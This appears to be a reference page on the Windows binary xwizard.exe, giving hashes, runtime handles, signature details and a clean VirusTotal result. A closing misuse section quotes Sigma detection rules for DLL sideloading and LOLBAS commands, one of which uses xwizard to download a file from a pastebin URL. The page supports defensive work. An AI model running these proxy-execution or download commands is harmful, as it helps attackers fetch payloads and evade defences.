xwizard.exe

  • File Path: C:\WINDOWS\system32\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 B923F5EE82097A226CF403A46579870C
SHA1 667C103C62BCCFA1BB5920DF141FC210E7421EE8
SHA256 0C2A3BF4F3ED998F6A50F34785E1838DD3FCC346F6B87093ADE8E63C0D97D1A4
SHA384 E8EF28D47ECB560A24838A247BCC504110D7AC2AF307D88EFC6357C4A9AB5A80C6F1FBDCF11D896C697A9844779470D7
SHA512 3ACF2DB23D61FE71314BF3677DB707B1B045B55F83E10E07A81044A2F58830B3C9347208B9CE87FAD31BFFBD62F259FD5AB52B269EB92AF20A569AE6BA55F18B
SSDEEP 1536:LPRsSufCUodixW/5Vw+duAN/kUKiaXURDoq4OZZZLlCIib:LPaSufCUodNBVw+QAN/fnakRD68wb
IMP A64091098129483C3D876A86009BBE1E
PESHA1 F247A528BB49058B5ECA832FD408F57E1FC4982A
PE256 60E885D8E8D2D662B74A6726644EEFA81E8B2BBFFFD05FACE6C5D625BC2DD41A

Runtime Data

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\xwizard.exe.mui File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(RW-) C:\Windows\System32 File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22000.120_none_9d947278b86cc467 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme1077709572 Section
\Windows\Theme3461253685 Section

Loaded Modules:

Path
C:\WINDOWS\System32\combase.dll
C:\WINDOWS\System32\GDI32.dll
C:\WINDOWS\System32\gdi32full.dll
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\System32\msvcp_win.dll
C:\WINDOWS\System32\msvcrt.dll
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\OLEAUT32.dll
C:\WINDOWS\System32\RPCRT4.dll
C:\WINDOWS\System32\shcore.dll
C:\WINDOWS\System32\ucrtbase.dll
C:\WINDOWS\System32\USER32.dll
C:\WINDOWS\System32\win32u.dll
C:\WINDOWS\system32\xwizard.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/0c2a3bf4f3ed998f6a50f34785e1838dd3fcc346f6b87093ade8e63c0d97d1a4/detection

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 47
C:\WINDOWS\system32\ComputerDefaults.exe 52
C:\WINDOWS\system32\ComputerDefaults.exe 52
C:\Windows\system32\ComputerDefaults.exe 49
C:\windows\system32\ComputerDefaults.exe 52
C:\Windows\system32\ComputerDefaults.exe 43
C:\Windows\system32\xwizard.exe 47
C:\windows\system32\xwizard.exe 47
C:\Windows\system32\xwizard.exe 43
C:\WINDOWS\system32\xwizard.exe 44
C:\Windows\system32\xwizard.exe 44
C:\windows\SysWOW64\ComputerDefaults.exe 54
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 41
C:\Windows\SysWOW64\ComputerDefaults.exe 47
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 43
C:\Windows\SysWOW64\ComputerDefaults.exe 47
C:\Windows\SysWOW64\ComputerDefaults.exe 41
C:\WINDOWS\SysWOW64\xwizard.exe 54
C:\Windows\SysWOW64\xwizard.exe 50
C:\Windows\SysWOW64\xwizard.exe 50
C:\windows\SysWOW64\xwizard.exe 49
C:\Windows\SysWOW64\xwizard.exe 52
C:\WINDOWS\SysWOW64\xwizard.exe 50

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.